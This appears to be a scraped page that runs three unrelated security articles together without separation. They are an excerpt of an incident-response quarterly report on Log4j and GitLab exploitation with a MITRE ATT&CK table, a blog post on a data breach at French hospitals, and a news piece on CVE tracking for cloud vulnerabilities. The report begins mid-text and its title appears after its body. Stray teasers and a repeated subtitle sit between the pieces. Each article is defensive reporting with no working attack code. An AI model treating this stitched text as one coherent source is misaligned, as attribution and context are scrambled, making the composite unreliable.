For the majority of engagements, identifying an initial vector was difficult due to shortfalls in logging and visibility. However, in engagements in which the initial vector could be confirmed, or reasonably assumed, this quarter featured a number of engagements where adversaries exploited public-facing applications that were vulnerable to Log4j. For example, in one engagement affecting a telecommunications company, CTIR observed a large number of PowerShell download requests to an IP address associated with Log4j exploitation attempts against vulnerable VMware Horizon servers. Following this activity, high CPU usage was detected on a VMware Horizon server, leading to the identification of several clusters of cryptocurrency miners, consistent with typical cryptocurrency miner threat actor behavior following the release of high-profile vulnerabilities.

In a Cerber ransomware incident affecting a holding company, the adversary used vulnerabilities affecting GitLab (CVE-2021-22204 and CVE-2021-22205) to upload and execute code remotely, ultimately granting unauthorized access to that system in the context of the "git" account. This is consistent with reporting from other security firms on a new version of Cerber ransomware targeting Atlassian Confluence and GitLab servers with older RCE vulnerabilities. The adversary attempted to expand access through privilege escalation and lateral movement and ultimately executed ransomware.  

**Security weaknesses**

The top recommendation that responders have for organizations is to implement multi-factor authentication (MFA) on all critical services, including endpoint detection response (EDR) solutions. MFA is an effective way to prevent adversaries from gaining unwanted access, and we routinely see threat activity that could have been prevented if MFA had been enabled.  

In one engagement that kicked off this quarter affecting a telecommunications company involving pre-ransomware TTPs, the adversary compromised the organization’s help desk/call center partner company. This was identified as the root cause of the compromise due to the third party having access to the organization’s Citrix machines while not enabling MFA. CTIR recommends that all third parties in the environment are following MFA security policies and guidelines.

**Top-observed MITRE ATT&CK techniques**

Below is a list of the MITRE ATT&CK techniques observed in this quarter’s IR engagements. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic in which they were leveraged. The table below represents the techniques used with a relevant example, and the approximate number of times seen. However, it is not an exhaustive list.

Key findings from the MITRE ATT&CK appendix include: 

*   We observed an increase in engagements in which initial access was achieved via phishing with a malicious link or document that relied upon subsequent user execution. Compared to last quarter, we observed more threats leveraging social engineering techniques, as well as masquerading as legitimate files or utilities to entice users to click or execute a given link or file.
*   Due to the number of engagements responders supported that exploited Log4j, we observed an increase in techniques relying on exploiting unpatched and vulnerable public-facing applications. This coincides with our observations of adversaries capitalizing on organizations’ lack of up-to-date patches and improper data protections.
*   We saw a large increase in defense evasion and collection techniques compared to previous quarters. The observed collection techniques exhibited the actors’ interest in specific information, including collecting details about certain hosts that could be used for targeting, keylogging to access credentials in the browser, and selecting particular files of interest for possible exfiltration.  
*   Consistent with last quarter’s findings, we continued to see a reliance on utilities such as PsExec and Cobalt Strike and a variety of remote access software, such as TeamViewer and ScreenConnect, to facilitate remote access. 

Tactic

Technique

Example

Initial Access (TA0001)

T1190 Exploit Public-Facing Application

Attackers successfully exploited a vulnerable application that was publicly exposed to the Internet.

Reconnaissance (TA0043)

T1592 Gather Victim Host Information

Malicious file contains details about host

Persistence (TA0003)

T1053 Scheduled Task/Job

Scheduled tasks were created on a compromised server

Execution (TA0002)

T1059.001 Command and Scripting Interpreter: PowerShell

Executes PowerShell code to retrieve information about the client's Active Directory environment

Discovery (TA0007)

T1087 Account Discovery

Use a utility like ADRecon to enumerate information on users and groups

Credential Access (TA0006)

T1003.001 OS Credential Dumping: LSASS Memory

Use “lsass.exe” for stealing password hashes from memory

Privilege Escalation (TA0004)

T1574.002 Hijack Execution Flow: DLL Side-Loading

A malicious PowerShell script attempted to side-load a DLL into memory

Lateral Movement (TA0008)

T1021.001 Remote Desktop Protocol

Adversary made attempts to move laterally using Windows Remote Desktop

Defense Evasion (TA0005)

T1027 Obfuscated Files or Information

Use base64-encoded PowerShell scripts

Command and Control (TA0011)

T1219 Remote Access Software

Remote access tools found on the compromised system

Impact (TA0040)

T1486 Data Encrypted for Impact

Deploy Conti ransomware and encrypt critical systems

Exfiltration (TA0010)

T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage

Actor exfiltrated data to file sharing site mega\[.\]nz

Collection (TA0009)

T1114.003 Email Collection: Email Forwarding Rule

Adversary used a compromised account to create a new inbox rule to place emails in a folder

Software/Tool

S0029 PsExec

Adversary made use of PsExec for lateral movement

Quarterly Report: Incident Response trends in Q1 2022

A group of French hospitals was taken offline afetr a data breach has been discovered. The stolen data are patient records including SSN, banking information, email addresses, and phone numbers.
The post Hospitals taken offline after cyberattack appeared first on Malwarebytes Labs.

![Hospitals taken offline after cyberattack](https://blog.malwarebytes.com/wp-content/uploads/2022/04/empty_hospital_room-900x506.png)

Posted: April 26, 2022 by

The GHT Coeur Grand Est has become a victim of a cyberattack on the hospital centers of Vitry-le-François and Saint-Dizier. The hospital’s administration has warned \[French\] that data have been exfiltrated and might be used for phishing in the future.

As a consequence, the GHT Cœur Grand Est has cut all incoming and outgoing internet connections from its franchises in order to protect and secure information systems and data.

**GHT Coeur Grand Est**

The GHT (Groupements Hospitaliers de Territoire) Coeur Grand Est is a group of nine hospitals in the Northeast of France (around Bar-le-Duc). Together they employ some 6,000 healthcare professionals and serve around 300,000 inhabitants of the region. Most of the hospitals within the GHT network operate their own IT infrastructure, but they do share certain resources. The stolen data come from the hospital centers of Vitry-le-François (Marne) and Saint-Dizier (Haute-Marne).

**The attack**

On April 19, staff discovered a network breach in the systems of the GHT. During that breach, the attackers managed to copy essential administrative data. As a result, the GHT decided to cut all incoming and outgoing internet connections until the situation was resolved.

The applications and software used internally on a daily basis were not affected by the attack and remain operational, but certain services like making online appointments aren’t possible at the moment. The computerized patient file system is fully functional.

The hospitals said the IT team is working to assess and identify the damage and, as quickly as possible, re-establish secure links with the outside world. The information flows that come from outside, mainly lab results, are handled in old-fashioned paper format or, as was done years ago, by fax.

**Vigilance**

The GHT has warned customers to be vigilant, saying there is no guarantee that the exfiltrated files will not be shared and used by malicious people.

GHT customers should stay on the lookout for targeted phishing attempts and scams that may look more trustworthy because the scammers have information you wouldn’t expect them to have.

*   Pay attention to the sender of messages, even if they appear to be an official sender.
*   Be careful with attachments. Don’t open them until you verified the origin.
*   Never respond to a request for confidential information, in particular banking information.
*   Pay attention to the content and wording of the message received. Phishing attempts often introduce some kind of urgency by scaring the receiver or putting time pressure behind the response.
*   Be wary of phone calls or texts from unknown numbers.

**Stolen data for sale**

While the hospital center’s announcement doesn’t contain any attribution clues, Bleeping Computer spotted a new entry on Industrial Spy’s website, a new marketplace for stolen data.

![listing on Industrial Spy platform](https://blog.malwarebytes.com/wp-content/uploads/2022/04/IndustrialSpy-600x62.png)

_image courtesy of Bleeping Computer_

Industrial Spy is a dark web platform that promotes itself as a marketplace for buying corporate data that contain sensitive information like schematics, financial reports, trade secrets, and client databases.

In this case, however, Industrial Spy isn’t offering anything that could draw the attention of a competitor. Instead, the data set exposes patient data among other administrative documents. The threat actors claim that the stolen personal data of patients includes social security numbers, passport scans, banking information, email addresses, and phone numbers.

Stay safe, everyone!

**RELATED ARTICLES**

![News Corp falls victim to cyberattack](https://blog.malwarebytes.com/wp-content/uploads/2022/02/NewsCorp_header-604x270.png)

February 7, 2022 - Media giant News Corp says it fell victim to a cyberattack that it discovered in January. Investigators suspect China to be behind the attack.

![50 percent of schools did not prepare for secure distance learning, Labs report reveals](https://blog.malwarebytes.com/wp-content/uploads/2019/06/MB_LABS-01-1-604x270.png)

December 7, 2020 - Schools faced a crisis this year, as the coronavirus forced educators across the country to suffer through lacking cybersecurity, our new report reveals.

![8 everyday technologies that can make you vulnerable to cyberattacks](https://blog.malwarebytes.com/wp-content/uploads/2018/08/everydaytechnologies-604x270.jpg)

August 9, 2018 - The security vulnerabilities of the latest developments in tech have been well documented. But what about everyday technologies that have been around for a while or are widely adopted? Here are eight commonly-used tech conveniences that are not as ironclad as you might hope.

![Singles’ Day deal seekers beware](https://blog.malwarebytes.com/wp-content/uploads/2017/11/shutterstock_7491459792-1-604x270.jpg)

November 9, 2017 - Originally a day set aside for singles in China to be proud of their singlehood, Singles’ Day has been transformed into what is arguably the world’s single largest e-commerce festival, thanks to the involvement of The Alibaba Group. In fact, the Alibaba Group alone reported $17.8 billion in sales; six times higher than what was...

![Remediation vs. prevention: How to place your bets](https://blog.malwarebytes.com/wp-content/uploads/2017/09/shutterstock_436847836-604x270.jpg)

September 13, 2017 - Building a security environment for businesses is a gamble these days. It's remediation vs. prevention. Which should you bet on?

Hospitals taken offline after cyberattack

Researchers propose fresh approaches to cloud-security bugs and mitigating exposure, impact and risk.

Researchers propose fresh approaches to cloud-security bugs and mitigating exposure, impact and risk.

Big gaps exist in the 22-year-old Common Vulnerability and Exposures (CVE) system that do not address dangerous flaws in cloud services that drive millions of apps and backend services. Too often, cloud providers needlessly expose customers to risk by not sharing the details of bugs discovered on their platform. A CVE-like approach to cloud bug management must exist to help customers weigh exposure, impact and mitigate risk.

That is the opinion of a growing number of security firms pushing for a better cloud vulnerability and risk management. They argue because of CVE identification rules, which only assign CVE tracking numbers to vulnerabilities that end-users and network admin can directly manage, the current model is broken.

MITRE, the non-profit organization behind the CVE system, does not designate CVE IDs for security issues deemed to be the responsibility of cloud providers. The assumption is that cloud providers own the problem, and that assigning CVEs that are not customer-controlled or patched by admins falls outside of the CVE system purview.

_\[**Editor’s Note:** This article was originally published in the free Threatpost eBook “Cloud Security: The Forecast for 2022.” In it we explore organizations’ top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. Please download the FREE eBook for the full story\]_

“\[It is a false\] assumption that all issues can be resolved by the cloud provider and therefore do not need a tracking number,” wrote Scott Piper, a cloud-security researcher with Summit Route, in a recent blog. “This view is sometimes incorrect, and even when the issue can be resolved by the cloud provider, I still believe it warrants having a record.”

Piper’s critiques are part of his introduction to a curated list of dozens of documented instances of cloud-service provider mistakes that he says prove the point.

Over the past year, for example, Amazon Web Services snuffed out a host of cross-account vulnerabilities. As well, Microsoft recently patched two nasty Azure bugs (ChaosDB and OMIGOD). And, last year, Alphabet’s Google Cloud Platform tackled a number of bugs, including a policy-bypass flaw.

“As we uncover new types of vulnerabilities, we discover more and more issues that do not fit the current \[MITRE CVE reporting\] model,” wrote cloud researchers Alon Schindel and Shir Tamari with the cloud security firm Wiz, in a post. “Security industry call to action: we need a \[centralized\] cloudvulnerability database.”

The researchers acknowledged that cloud service providers do respond quickly to cloud bugs and work fast to mitigate issues. However, the process of identifying, tracking and helping those affected to assess risk needs streamlining.

![AWS computing](https://media.threatpost.com/wp-content/uploads/sites/103/2020/08/21091044/podcast-news-wrap-300x203.jpg)

An example: When researchers found a series of cross-account AWS vulnerabilities in August, Amazon moved quickly to mitigate the problem by changing AWS defaults and updating the user set-up guides. Next, AWS emailed affected customers and urged them to update any vulnerable configurations.

“The problem here is that \[many\] users weren’t aware of the vulnerable configuration and the response actions they should take. Either the email never made it to the right person, or it got lost in a sea of other issues,” Schindel and Tamari wrote.

In the context of cloud, affected users should be able to easily track a vulnerability and whether it has already been addressed in their organizations, as well as what cloud resources have already been scoped and fixed, the researchers said.

The CVE approach to cloud bugs also has the support of the Cloud Security Alliance (CSA), which counts Google, Microsoft and Oracle as executive members.

**Cloud Bug CVE Approach: Shared Industry Goals**

The efforts share many of the same goals, including:

*   Standardized notification channels to be used by all cloud service providers
*   Standardized bug or issue tracking
*   Severity scoring to help prioritize mitigation efforts
*   Transparency into the vulnerabilities and their detection

In August, Brian Martin, on his blog Curmudgeonly Ways, pointed out that MITRE’s history covering cloud vulnerabilities is mixed.

“At times, some of the CVE (editorial) Board has advocated for CVEs to expand to cover cloud vulnerabilities, while others argue against it. At least one who advocated for CVE coverage said they should get CVE IDs, \[with\] others that supported and disagreed with the idea saying that if cloud was covered, \[those bugs\] should get their own ID scheme,” he wrote.

Martin also pointed out that even if a CVE-like system were created, the question remains: Who will run it?

“The only thing worse than such a project not getting off the ground is one that does, becomes an essential part of security programs, and then goes away,” he said.

In July, under the auspices of CSA, the Global Security Database Working Group was chartered to go one step further than the idea of expanding CVE tracking. Its goal is to offer an alternative to CVEs and what the group called a one-size-fits-all approach to vulnerability identification. The working group believes the “on-demand” nature and continued growth of IT infrastructures brought on by cloud migration necessitate a corresponding maturity in cybersecurity.

“What we see is a need to figure out how to create identifiers for vulnerabilities in software, services and other IT infrastructure that is proportional to the amount of technology in existence,” said Jim Reavis, cofounder and chief executive officer of CSA, when introducing the working group. “The common design goal is for vulnerability identifiers to be easily discovered, fast to assign, updatable and publicly available” – not just in the cloud, but across IT infrastructure.

**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our_** **_FREE downloadable eBook_****_, “Cloud Security: The Forecast for 2022.”_** **_We explore organizations’ top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**

Tag

#rce